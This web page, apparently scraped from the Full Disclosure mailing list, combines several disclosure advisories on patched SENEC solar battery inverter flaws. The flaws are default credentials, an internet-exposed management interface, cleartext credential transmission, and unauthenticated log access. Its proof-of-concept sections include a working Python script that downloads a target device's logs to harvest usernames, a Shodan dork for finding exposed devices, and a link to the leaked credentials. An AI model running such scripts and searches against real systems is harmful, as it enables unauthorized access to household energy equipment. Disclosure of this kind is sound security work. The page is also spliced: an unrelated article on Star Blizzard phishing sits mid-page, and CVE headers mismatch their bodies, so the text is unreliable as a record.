> > Solution Status: Fixed
> > Manufacturer Notification: 2023-06-05
> > Public Disclosure: 2023-11-01
> > CVE Reference: CVE-2023-39170
> > Author of Advisory: Ph0s\[4\], R0ckE7

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Overview:
> > Foreword:
> > This vulnerability was reported to the enbw-cert. we would like to
> > thank enbw-cert for taking care of the vulns and patch the systems.
> > we decided to publish when most of the reported vulns are patched
> > to make sure nobody is harmed when 3rdparys exploit the mentioned vulns.

> > About Senec:
> > We are SENEC

> > We have been the EnBW energy independence experts since 2018 – but we have
> > put our heart and soul into guiding customers on the route to independence
> > since SENEC was founded in 2009. Our passion lies in actively promoting the
> > energy transition with innovative ideas and pioneering products. And,
> > because we don’t do things by halves, our unwavering ambition is to create
> > integrated solutions that enable you to enjoy the highest possible degree
> > of independence and sustainability through self-generation of solar
> > electricity.

> > About SENEC Home:

> > SENEC.Home: The smart electricity storage device for your home

> > SENEC.Home is the heart of the your sustainable, affordable supply of solar
> > electricity. The smart battery storage device stores excess electricity
> > generated by your PV system so that you can use it when you need it – such as
> > when your household’s energy consumption rises in the evening, or on rainy days
> > when your PV system generates less power.

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Vulnerability Details:

> > The credentials for the senec inverters are known in public.

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Proof of Concept (PoC):

> > The attack consists of the following steps:

> > 1\. use google to optain them, eg:
> > https://www.photovoltaikforum.com/thread/206930-senec-v3-hybrid-zugangsdaten/

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Solution:
> > Patched by Manufacturer
> > (Rolled out until September 11, 2023)

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Disclosure Timeline:

> > 2022-06-01: Vulnerability discovered
> > 2023-06-05: Vulnerability reported to manufacturer
> > 2023-09-11: Patch rollout by manufacturer to affected devices
> > 2023-11-01: Public disclosure of vulnerability

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Researcher:
> > Ph0s\[4\], R0ckE7

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Disclaimer:

> > The information provided in this security advisory is provided "as is"
> > and without warranty of any kind. Details of this security advisory may
> > be updated in order to provide as accurate information as possible.

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Copyright:

> > Creative Commons - Attribution (by) - Version 4.0
> > URL: https://creativecommons.org/licenses/by/4.0/deed.en
> > \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: https://seclists.org/fulldisclosure/

**Attachment: publickey - Phos4Me@proton.me - 0x3F4F673D.asc**  
_Description:_

**Attachment: signature.asc**  
_Description:_ OpenPGP digital signature

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Senec Inverters Home V1, V2, V3 Home & Hybrid Publicly Accessible Default Credentials- CVE-2023-39170** _Phos4Me via Fulldisclosure (Nov 12)_

CVE-2023-39169: Senec Inverters Home V1, V2, V3 Home & Hybrid Publicly Accessible Default Credentials- CVE-2023-39170

SENEC Storage Box V1,V2 and V3 accidentially expose a management UI accessible with publicly known admin credentials.

**Full Disclosure mailing list archives**

_From_: Phos4Me via Fulldisclosure <fulldisclosure () seclists org>  
_Date_: Fri, 10 Nov 2023 07:11:03 +0000  

> > Advisory ID: Ph0s-2023-005
> > Product: EnBw - SENEC legacy storage box: V1-V3
> > Manufacturer: SENEC - a part of EnBw
> > Affected Version(s): Firmware: all (as of 2023-06-19)
> > Tested Version(s): current
> > Vulnerability Type: CWE-923: Improper Restriction of Communication
> > Channel to Intended Endpoints

> > Risk Level:
> > CVSS v3.1 Vector:
> > AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L (7.4 High)

> > Manufacturer Risk Level Rating:
> > AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L/E:H/RL:T/RC:C
> > Overall CVSS Score: 7.2

> > Solution Status: Fixed
> > Manufacturer Notification: 2023-06-05
> > Public Disclosure: 2023-11-01
> > CVE Reference: CCVE-2023-39171
> > Author of Advisory: Ph0s\[4\], R0ckE7

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Overview:
> > Foreword:
> > This vulnerability was reported to the enbw-cert. we would like to
> > thank enbw-cert for taking care of the vulns and patch the systems.
> > we decided to publish when most of the reported vulns are patched
> > to make sure nobody is harmed when 3rdparys exploit the mentioned vulns.

> > About Senec:
> > We are SENEC

> > We have been the EnBW energy independence experts since 2018 – but we have
> > put our heart and soul into guiding customers on the route to independence
> > since SENEC was founded in 2009. Our passion lies in actively promoting the
> > energy transition with innovative ideas and pioneering products. And,
> > because we don’t do things by halves, our unwavering ambition is to create
> > integrated solutions that enable you to enjoy the highest possible degree
> > of independence and sustainability through self-generation of solar
> > electricity.

> > About SENEC Home:

> > SENEC.Home: The smart electricity storage device for your home

> > SENEC.Home is the heart of the your sustainable, affordable supply of solar
> > electricity. The smart battery storage device stores excess electricity
> > generated by your PV system so that you can use it when you need it – such as
> > when your household’s energy consumption rises in the evening, or on rainy days
> > when your PV system generates less power.

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Vulnerability Details:

> > The management interface of the SENEC.Inverter is publicly accessible via the
> > Internet. This circumstance is recommended by the manufacturer and customers are
> > advised to open the necessary ports to enable remote maintenance.
> > As a result, anyone who manages to detect and successfully exploit security
> > vulnerabilities in SENEC.Inverter, for instance the authors of this report, can
> > access and compromise all devices available on the internet without
> > restrictions. To achieve this,it is possible to use an IoT search engine such as
> > Shodan to automatically obtain an up-to-date list of IP addresses of all devices
> > in just a few seconds.

> > Besides Shodan, there are other IoT search engines such as Censys or ZoomEye to
> > complement the list even further.
> > Consequently, it is very easy for an attacker to develop an exploit script for
> > the automated compromise of all SENEC.Inverter devices, e.g. to simul-
> > taneously shut down all appliances or to damage them through a targeted
> > overload. For this purpose, only the hard-coded credentials previously
> > identified in findings CVE-2023-39168 and CVE-2023-39169 need to be used in
> > conjunction with SENEC.Inverter’s built-in API.

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Proof of Concept (PoC):

> > The attack consists of the following steps:

> > 1\. use the shodan dork to obtain management-interfaces.
> > (no longer valid, patched by manufacturer)

> > https://www.shodan.io/search?query=http.html%3A<title>SENEC<%2Ftitle%
> > 3E

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Solution:
> > Patched by Manufacturer
> > (Rolled out until September 11, 2023)

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Disclosure Timeline:

> > 2022-06-01: Vulnerability discovered
> > 2023-06-05: Vulnerability reported to manufacturer
> > 2023-09-11: Patch rollout by manufacturer to affected devices
> > 2023-11-01: Public disclosure of vulnerability

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Researcher:
> > Ph0s\[4\], R0ckE7

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Disclaimer:

> > The information provided in this security advisory is provided "as is"
> > and without warranty of any kind. Details of this security advisory may
> > be updated in order to provide as accurate information as possible.

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Copyright:

> > Creative Commons - Attribution (by) - Version 4.0
> > URL: https://creativecommons.org/licenses/by/4.0/deed.en
> > \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: https://seclists.org/fulldisclosure/

**Attachment: publickey - Phos4Me@proton.me - 0x3F4F673D.asc**  
_Description:_

**Attachment: signature.asc**  
_Description:_ OpenPGP digital signature

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Senec Inverters Home V1, V2, V3 Home & Hybrid Publicly Accessible Management Interface “Local GUI”- CVE-2023-39171** _Phos4Me via Fulldisclosure (Nov 12)_

CVE-2023-39171: Senec Inverters Home V1, V2, V3 Home & Hybrid Publicly Accessible Management Interface “Local GUI”- CVE-2023-39171

The threat actor known as COLDRIVER has continued to engage in credential theft activities against entities that are of strategic interests to Russia while simultaneously improving its detection evasion capabilities.
The Microsoft Threat Intelligence team is tracking under the cluster as Star Blizzard (formerly SEABORGIUM). It's also called Blue Callisto, BlueCharlie (or TAG-53),

Threat Intelligence / Cyber Espionage

The threat actor known as COLDRIVER has continued to engage in credential theft activities against entities that are of strategic interests to Russia while simultaneously improving its detection evasion capabilities.

The Microsoft Threat Intelligence team is tracking under the cluster as **Star Blizzard** (formerly SEABORGIUM). It's also called Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), and TA446.

The adversary "continues to prolifically target individuals and organizations involved in international affairs, defense, and logistics support to Ukraine, as well as academia, information security companies, and other entities aligning with Russian state interests," Redmond said.

Star Blizzard, linked to Russia's Federal Security Service (FSB), has a track record of setting up lookalike domains that impersonate the login pages of targeted companies. It's known to be active since at least 2017.

UPCOMING WEBINAR

Cracking the Code: Learn How Cyber Attackers Exploit Human Psychology

Ever wondered why social engineering is so effective? Dive deep into the psychology of cyber attackers in our upcoming webinar.

Join Now

In August 2023, Recorded Future revealed 94 new domains that are part of the threat actor's attack infrastructure, most of which feature keywords related to information technology and cryptocurrency.

Microsoft said it observed the adversary leveraging server-side scripts to prevent automated scanning of the actor-controlled infrastructure starting April 2023, moving away from hCaptcha to determine targets of interest and redirecting the browsing session to the Evilginx server.

The server-side JavaScript code is designed to check if the browser has any plugins installed, if the page is being accessed by an automation tool like Selenium or PhantomJS, and transmit the results to the server in the form of a HTTP POST request.

"Following the POST request, the redirector server assesses the data collected from the browser and decides whether to allow continued browser redirection," Microsoft said.

"When a good verdict is reached, the browser receives a response from the redirection server, redirecting to the next stage of the chain, which is either an hCaptcha for the user to solve, or direct to the Evilginx server."

Also newly used by Star Blizzard are email marketing services like HubSpot and MailerLite to craft campaigns that serve as the starting point of the redirection chain that culminates at the Evilginx server hosting the credential harvesting page.

In addition, the threat actor has been observed using a domain name service (DNS) provider to resolve actor-registered domain infrastructure, sending password-protected PDF lures embedding the links to evade email security processes as well as host the files on Proton Drive.

That's not all. In a sign that the threat actor is actively keeping tabs on public reporting into its tactics and techniques, it has now upgraded its domain generation algorithm (DGA) to include a more randomized list of words when naming them.

Despite these changes, "Star Blizzard activities remain focused on email credential theft, predominantly targeting cloud-based email providers that host organizational and/or personal email accounts," Microsoft said.

"Star Blizzard remains constant in their use of pairs of dedicated VPSs to host actor-controlled infrastructure (redirector + Evilginx servers) used for spear-phishing activities, where each server usually hosts a separate actor registered domain."

**U.K. Sanctions Two Members of Star Blizzard**

The development comes as the U.K. called out Star Blizzard for "sustained unsuccessful attempts to interfere in U.K. political processes" by targeting high-profile individuals and entities through cyber operations.

Besides linking Star Blizzard to Centre 18, a subordinate element within FSB, the U.K. government sanctioned two members of the hacking crew – Ruslan Aleksandrovich Peretyatko and Andrey Stanislavovich Korinets (aka Alexey Doguzhiev) – for their involvement in the spear-phishing campaigns.

The activity "resulted in unauthorized access and exfiltration of sensitive data, which was intended to undermine UK organizations and more broadly, the UK government," it said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Warns of COLDRIVER's Evolving Evading and Credential-Stealing Tactics

The affected devices transmit sensitive information unencrypted allowing a remote unauthenticated attacker to capture and modify network traffic.

**Full Disclosure mailing list archives**

_From_: Phos4Me via Fulldisclosure <fulldisclosure () seclists org>  
_Date_: Fri, 10 Nov 2023 07:13:23 +0000  

> > Advisory ID: Ph0s-2023-004
> > Product: EnBw - SENEC legacy storage box: V1-V3
> > Manufacturer: SENEC - a part of EnBw
> > Affected Version(s): Firmware: all (as of 2023-06-19)
> > Tested Version(s): current
> > Vulnerability Type: CWE-319: Cleartext Transmission of Sensitive Information

> > Risk Level:
> > CVSS v3.1 Vector:
> > AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N (8.1 High)

> > Manufacturer Risk Level Rating:
> > AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L/E:F/RL:U/RC:C
> > Overall CVSS Score: 7.4

> > Solution Status: Fixed
> > Manufacturer Notification: 2023-06-05
> > Public Disclosure: 2023-11-01
> > CVE Reference: CVE-2023-39172
> > Author of Advisory: Ph0s\[4\], R0ckE7

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Overview:
> > Foreword:
> > This vulnerability was reported to the enbw-cert. we would like to
> > thank enbw-cert for taking care of the vulns and patch the systems.
> > we decided to publish when most of the reported vulns are patched
> > to make sure nobody is harmed when 3rdparys exploit the mentioned vulns.

> > About Senec:
> > We are SENEC

> > We have been the EnBW energy independence experts since 2018 – but we have
> > put our heart and soul into guiding customers on the route to independence
> > since SENEC was founded in 2009. Our passion lies in actively promoting the
> > energy transition with innovative ideas and pioneering products. And,
> > because we don’t do things by halves, our unwavering ambition is to create
> > integrated solutions that enable you to enjoy the highest possible degree
> > of independence and sustainability through self-generation of solar
> > electricity.

> > About SENEC Home:

> > SENEC.Home: The smart electricity storage device for your home

> > SENEC.Home is the heart of the your sustainable, affordable supply of solar
> > electricity. The smart battery storage device stores excess electricity
> > generated by your PV system so that you can use it when you need it – such as
> > when your household’s energy consumption rises in the evening, or on rainy days
> > when your PV system generates less power.

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Vulnerability Details:

> > The management interface of the SENEC.Inverter transmits security-critical data
> > (authentication credentials) in cleartext in a communication channel that can be
> > sniffed by unauthorized actors. For example, in networking, packets can traverse
> > many intermediary nodes from the source to the destination, whether across the
> > internet or an internal network. Some actors might have privileged access to a
> > network interface or any link along the channel, such as a router. As a result,
> > network traffic could be sniffed by adversaries, spilling security-critical data.
> > Incidentally, this refers not only to remote maintenance of the photovoltaic
> > system, but also to on-site configuration by a technician at the customer’s
> > premises. Due to the lack of transport encryption, a technically skilled
> > customer is therefore also able to gather authentication credentials by
> > intercepting network traffic, e.g. at the central network gateway.

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Proof of Concept (PoC):

> > n/a, simply sniff the network

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Solution:
> > Patched by Manufacturer
> > (Rolled out until September 11, 2023)

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Disclosure Timeline:

> > 2022-06-01: Vulnerability discovered
> > 2023-06-05: Vulnerability reported to manufacturer
> > 2023-09-11: Patch rollout by manufacturer to affected devices
> > 2023-11-01: Public disclosure of vulnerability

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Researcher:
> > Ph0s\[4\], R0ckE7

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Disclaimer:

> > The information provided in this security advisory is provided "as is"
> > and without warranty of any kind. Details of this security advisory may
> > be updated in order to provide as accurate information as possible.

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Copyright:

> > Creative Commons - Attribution (by) - Version 4.0
> > URL: https://creativecommons.org/licenses/by/4.0/deed.en
> > \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: https://seclists.org/fulldisclosure/

**Attachment: publickey - Phos4Me@proton.me - 0x3F4F673D.asc**  
_Description:_

**Attachment: signature.asc**  
_Description:_ OpenPGP digital signature

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Senec Inverters Home V1, V2, V3 Home & Hybrid Cleartext Transmission of Authentication Credentials - CVE-2023-39172** _Phos4Me via Fulldisclosure (Nov 12)_

CVE-2023-39172: Full Disclosure: Senec Inverters Home V1, V2, V3 Home & Hybrid Cleartext Transmission of Authentication Credentials

In SENEC Storage Box V1,V2 and V3 an unauthenticated remote attacker can obtain the devices' logfiles that contain sensitive data.

**Full Disclosure mailing list archives**

_From_: Phos4Me via Fulldisclosure <fulldisclosure () seclists org>  
_Date_: Fri, 10 Nov 2023 07:12:01 +0000  

> > Advisory ID: Ph0s-2023-002
> > Product: EnBw - SENEC legacy storage box: V1-V3
> > Manufacturer: SENEC - a part of EnBw
> > Affected Version(s): Firmware: all (as of 2023-06-19)
> > Tested Version(s): current
> > Vulnerability Type: CWE-200: Exposure of Sensitive Information to an
> > Unauthorized Actor

> > Risk Level: CVSS v3.1 Vector:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (7.5 High)

> > Manufacturer Risk Level Rating:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H/RL:T/RC:C
> > Overall CVSS Score: 7.2

> > Solution Status: Fixed
> > Manufacturer Notification: 2023-06-05
> > Public Disclosure: 2023-11-01
> > CVE Reference: CVE-2023-39168
> > Author of Advisory: Ph0s\[4\], R0ckE7

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Overview:
> > Foreword:
> > This vulnerability was reported to the enbw-cert. we would like to
> > thank enbw-cert for taking care of the vulns and patch the systems.
> > we decided to publish when most of the reported vulns are patched
> > to make sure nobody is harmed when 3rdparys exploit the mentioned vulns.

> > About Senec:
> > We are SENEC

> > We have been the EnBW energy independence experts since 2018 – but we have
> > put our heart and soul into guiding customers on the route to independence
> > since SENEC was founded in 2009. Our passion lies in actively promoting the
> > energy transition with innovative ideas and pioneering products. And,
> > because we don’t do things by halves, our unwavering ambition is to create
> > integrated solutions that enable you to enjoy the highest possible degree
> > of independence and sustainability through self-generation of solar
> > electricity.

> > About SENEC Home:

> > SENEC.Home: The smart electricity storage device for your home

> > SENEC.Home is the heart of the your sustainable, affordable supply of solar
> > electricity. The smart battery storage device stores excess electricity
> > generated by your PV system so that you can use it when you need it – such as
> > when your household’s energy consumption rises in the evening, or on rainy days
> > when your PV system generates less power.

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Vulnerability Details:

> > As already stated in CVE-2023-39167, no authentication is required to access log
> > information. Therefore, and due to the predictable URL scheme, it is possible
> > for an attacker to download all existing log files to obtain the username.

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Proof of Concept (PoC):

> > The attack consists of the following steps:

> > 1\. parse the script using this PoC Code to obtail the username:
> > import argparse
> > import datetime
> > import os
> > import requests

> > def get\_senec\_logs(senec\_ip, day\_range, break\_on\_username):
> > start\_date = datetime.datetime.today()
> > end\_date = start\_date - datetime.timedelta(days=day\_range)
> > delta = datetime.timedelta(days=1)

> > while end\_date < start\_date:
> > try:
> > senec\_url = f"http://{senec\_ip}/log/{start\_date.strftime('%Y')}/" \\
> > f"{start\_date.strftime('%m')}/{start\_date.strftime('%d')}.log"
> > r = requests.get(senec\_url)
> > print(f"HTTP Status Code {r.status\_code}: {senec\_url}")

> > if r.status\_code != 200: break
> > if r.headers\["Content-Length"\] == "0": break

> > os.makedirs(os.path.dirname(senec\_url.replace("http://";, "")), exist\_ok=True)
> > with open(senec\_url.replace("http://";, ""), "wb") as senec\_log\_file:
> > senec\_log\_file.write(r.content)
> > offset = r.content.find(bytes("username:", "utf-8"))
> > if offset != -1:
> > print(f"Username found in {senec\_log\_file.name} at offset {offset}")
> > if break\_on\_username: break
> > except requests.ConnectionError:
> > print("Failed to connect to SENEC.Inverter")
> > break
> > except Exception as e:
> > print(f"An unhandled exception occurred:\\n{e}")
> > break
> > start\_date -= delta

> > if name == 'main':
> > parser = argparse.ArgumentParser(description="Download SENEC.Inverter log files")
> > parser.add\_argument("ip", type=str, help="IP address of the target SENEC.Inverter")
> > parser.add\_argument("-b", "--break-on-username", action="store\_true", default=False, required=False,
> > help="stop downloading once a username is found")
> > parser.add\_argument("-d", "--day-range", type=int, action="store", default=365 \* 20, required=False,
> > help="number of days to download log files in reverse order starting today")
> > args = parser.parse\_args()
> > get\_senec\_logs(args.ip, args.day\_range, args.break\_on\_username)

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Solution:
> > Patched by Manufacturer
> > (Rolled out until September 11, 2023)

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Disclosure Timeline:

> > 2022-06-01: Vulnerability discovered
> > 2023-06-05: Vulnerability reported to manufacturer
> > 2023-09-11: Patch rollout by manufacturer to affected devices
> > 2023-11-01: Public disclosure of vulnerability

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Researcher:
> > Ph0s\[4\], R0ckE7

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Disclaimer:

> > The information provided in this security advisory is provided "as is"
> > and without warranty of any kind. Details of this security advisory may
> > be updated in order to provide as accurate information as possible.

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Copyright:

> > Creative Commons - Attribution (by) - Version 4.0
> > URL: https://creativecommons.org/licenses/by/4.0/deed.en
> > \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: https://seclists.org/fulldisclosure/

**Attachment: publickey - Phos4Me@proton.me - 0x3F4F673D.asc**  
_Description:_

**Attachment: signature.asc**  
_Description:_ OpenPGP digital signature

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Senec Inverters Home V1, V2, V3 Home & Hybrid Exposure of the Username to an Unauthorized Actor - CVE-2023-39168** _Phos4Me via Fulldisclosure (Nov 12)_

Tag

#web